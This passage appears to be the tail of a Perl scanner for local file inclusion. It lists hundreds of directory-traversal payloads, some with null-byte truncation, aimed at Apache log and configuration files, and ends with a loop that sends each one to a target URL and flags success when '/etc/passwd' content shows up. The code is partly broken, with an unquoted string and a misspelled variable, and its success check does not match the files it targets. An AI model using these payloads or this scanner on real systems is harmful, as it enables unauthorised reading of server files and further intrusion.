'../../../../../../var/log/apache2/error_log%00',
'../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../var/log/apache2/error_log%00',
'../../../../../../../../../../../var/log/apache2/error_log%00',
'/var/log/apache2/access_log',
'../var/log/apache2/access_log',
'../../var/log/apache2/access_log',
'../../../var/log/apache2/access_log',
'../../../../var/log/apache2/access_log',
'../../../../../var/log/apache2/access_log',
'../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../../var/log/apache2/access_log',
'/var/log/apache2/access_log%00',
'../var/log/apache2/access_log%00',
'../../var/log/apache2/access_log%00',
'../../../var/log/apache2/access_log%00',
'../../../../var/log/apache2/access_log%00',
'../../../../../var/log/apache2/access_log%00',
'../../../../../../var/log/apache2/access_log%00',
'../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../var/log/apache2/access_log%00',
'../../../../../../../../../../../var/log/apache2/access_log%00',
'/var/log/access_log',
'../var/log/access_log',
'../../var/log/access_log',
'../../../var/log/access_log',
'../../../../var/log/access_log',
'../../../../../var/log/access_log',
'../../../../../../var/log/access_log',
'../../../../../../../var/log/access_log',
'../../../../../../../../var/log/access_log',
'../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../var/log/access_log',
'/var/log/access_log%00',
'../var/log/access_log%00',
'../../var/log/access_log%00',
'../../../var/log/access_log%00',
'../../../../var/log/access_log%00',
'../../../../../var/log/access_log%00',
'../../../../../../var/log/access_log%00',
'../../../../../../../var/log/access_log%00',
'../../../../../../../../var/log/access_log%00',
'../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../var/log/access_log%00',
'../../../../../../../../../../../var/log/access_log%00',
'/var/log/error_log',
'../var/log/error_log',
'../../var/log/error_log',
'../../../var/log/error_log',
'../../../../var/log/error_log',
'../../../../../var/log/error_log',
'../../../../../../var/log/error_log',
'../../../../../../../var/log/error_log',
'../../../../../../../../var/log/error_log',
'../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../../var/log/error_log',
'/var/log/error_log%00',
'../var/log/error_log%00',
'../../var/log/error_log%00',
'../../../var/log/error_log%00',
'../../../../var/log/error_log%00',
'../../../../../var/log/error_log%00',
'../../../../../../var/log/error_log%00',
'../../../../../../../var/log/error_log%00',
'../../../../../../../../var/log/error_log%00',
'../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../var/log/error_log%00',
'../../../../../../../../../../../var/log/error_log%00',
'/var/www/logs/error_log',
'../var/www/logs/error_log',
'../../var/www/logs/error_log',
'../../../var/www/logs/error_log',
'../../../../var/www/logs/error_log',
'../../../../../var/www/logs/error_log',
'../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../var/www/logs/error_log',
'/var/www/logs/error_log%00',
'../var/www/logs/error_log%00',
'../../var/www/logs/error_log%00',
'../../../var/www/logs/error_log%00',
'../../../../var/www/logs/error_log%00',
'../../../../../var/www/logs/error_log%00',
'../../../../../../var/www/logs/error_log%00',
'../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../var/www/logs/error_log%00',
'../../../../../../../../../../../var/www/logs/error_log%00',
'/var/www/logs/access_log',
'../var/www/logs/access_log',
'../../var/www/logs/access_log',
'../../../var/www/logs/access_log',
'../../../../var/www/logs/access_log',
'../../../../../var/www/logs/access_log',
'../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../var/www/logs/access_log',
'/var/www/logs/access_log%00',
'../var/www/logs/access_log%00',
'../../var/www/logs/access_log%00',
'../../../var/www/logs/access_log%00',
'../../../../var/www/logs/access_log%00',
'../../../../../var/www/logs/access_log%00',
'../../../../../../var/www/logs/access_log%00',
'../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../var/www/logs/access_log%00',
'../../../../../../../../../../../var/www/logs/access_log%00',
'/usr/local/apache/logs/error_log',
'../usr/local/apache/logs/error_log',
'../../usr/local/apache/logs/error_log',
'../../../usr/local/apache/logs/error_log',
'../../../../usr/local/apache/logs/error_log',
'../../../../../usr/local/apache/logs/error_log',
'../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../usr/local/apache/logs/error_log',
'/usr/local/apache/logs/error_log%00',
'../usr/local/apache/logs/error_log%00',
'../../usr/local/apache/logs/error_log%00',
'../../../usr/local/apache/logs/error_log%00',
'../../../../usr/local/apache/logs/error_log%00',
'../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../usr/local/apache/logs/error_log%00',
'../../../../../../../../../../../usr/local/apache/logs/error_log%00',
'/var/log/httpd/access_log',
'../var/log/httpd/access_log',
'../../var/log/httpd/access_log',
'../../../var/log/httpd/access_log',
'../../../../var/log/httpd/access_log',
'../../../../../var/log/httpd/access_log',
'../../../../../../var/log/httpd/access_log',
'../../../../../../../var/log/httpd/access_log',
'../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../var/log/httpd/access_log',
'/var/log/httpd/access_log%00',
'../var/log/httpd/access_log%00',
'../../var/log/httpd/access_log%00',
'../../../var/log/httpd/access_log%00',
'../../../../var/log/httpd/access_log%00',
'../../../../../var/log/httpd/access_log%00',
'../../../../../../var/log/httpd/access_log%00',
'../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../var/log/httpd/access_log%00',
'../../../../../../../../../../../var/log/httpd/access_log%00',
'/var/log/httpd/error_log',
'../var/log/httpd/error_log',
'../../var/log/httpd/error_log',
'../../../var/log/httpd/error_log',
'../../../../var/log/httpd/error_log',
'../../../../../var/log/httpd/error_log',
'../../../../../../var/log/httpd/error_log',
'../../../../../../../var/log/httpd/error_log',
'../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../../var/log/httpd/error_log',
'/var/log/httpd/error_log%00',
'../var/log/httpd/error_log%00',
'../../var/log/httpd/error_log%00',
'../../../var/log/httpd/error_log%00',
'../../../../var/log/httpd/error_log%00',
'../../../../../var/log/httpd/error_log%00',
'../../../../../../var/log/httpd/error_log%00',
'../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../var/log/httpd/error_log%00',
'../../../../../../../../../../../var/log/httpd/error_log%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'/etc/httpd/conf/httpd.conf',
'../etc/httpd/conf/httpd.conf',
'../../etc/httpd/conf/httpd.conf',
'../../../etc/httpd/conf/httpd.conf',
'../../../../etc/httpd/conf/httpd.conf',
'../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf',
'/etc/httpd/conf/httpd.conf%00',
'../etc/httpd/conf/httpd.conf%00',
'../../etc/httpd/conf/httpd.conf%00',
'../../../etc/httpd/conf/httpd.conf%00',
'../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'../../../../../../../../../../../etc/httpd/conf/httpd.conf%00',
'/etc/apache/conf/httpd.conf',
'../etc/apache/conf/httpd.conf',
'../../etc/apache/conf/httpd.conf',
'../../../etc/apache/conf/httpd.conf',
'../../../../etc/apache/conf/httpd.conf',
'../../../../../etc/apache/conf/httpd.conf',
'../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../../../../../../etc/apache/conf/httpd.conf',
'/etc/apache/conf/httpd.conf%00',
'../etc/apache/conf/httpd.conf%00',
'../../etc/apache/conf/httpd.conf%00',
'../../../etc/apache/conf/httpd.conf%00',
'../../../../etc/apache/conf/httpd.conf%00',
'../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../etc/apache/conf/httpd.conf%00',
'/usr/local/etc/apache/conf/httpd.conf',
'../usr/local/etc/apache/conf/httpd.conf',
'../../usr/local/etc/apache/conf/httpd.conf',
'../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'/usr/local/etc/apache/conf/httpd.conf%00',
'../usr/local/etc/apache/conf/httpd.conf%00',
'../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf%00',
'/etc/apache2/httpd.conf',
'../etc/apache2/httpd.conf',
'../../etc/apache2/httpd.conf',
'../../../etc/apache2/httpd.conf',
'../../../../etc/apache2/httpd.conf',
'../../../../../etc/apache2/httpd.conf',
'../../../../../../etc/apache2/httpd.conf',
'../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../../../etc/apache2/httpd.conf',
'/etc/apache2/httpd.conf%00',
'../etc/apache2/httpd.conf%00',
'../../etc/apache2/httpd.conf%00',
'../../../etc/apache2/httpd.conf%00',
'../../../../etc/apache2/httpd.conf%00',
'../../../../../etc/apache2/httpd.conf%00',
'../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../etc/apache2/httpd.conf%00',
'../../../../../../../../../../../etc/apache2/httpd.conf%00',
'/usr/local/apache/conf/httpd.conf',
'../usr/local/apache/conf/httpd.conf',
'../../usr/local/apache/conf/httpd.conf',
'../../../usr/local/apache/conf/httpd.conf',
'../../../../usr/local/apache/conf/httpd.conf',
'../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf',
'/usr/local/apache/conf/httpd.conf%00',
'../usr/local/apache/conf/httpd.conf%00',
'../../usr/local/apache/conf/httpd.conf%00',
'../../../usr/local/apache/conf/httpd.conf%00',
'../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache/conf/httpd.conf%00',
'/usr/local/apache2/conf/httpd.conf',
'../usr/local/apache2/conf/httpd.conf',
'../../usr/local/apache2/conf/httpd.conf',
'../../../usr/local/apache2/conf/httpd.conf',
'../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf%00',
'../usr/local/apache2/conf/httpd.conf%00',
'../../usr/local/apache2/conf/httpd.conf%00',
'../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00',
'../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00');
print ">start scaning[...]\n";

foreach $scan(@vuls){
$url = $link.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = LFI PRESENT!;}
else { $msg = "Not Found";}
print "$scaning..........[$msg]\n";
#EOF
}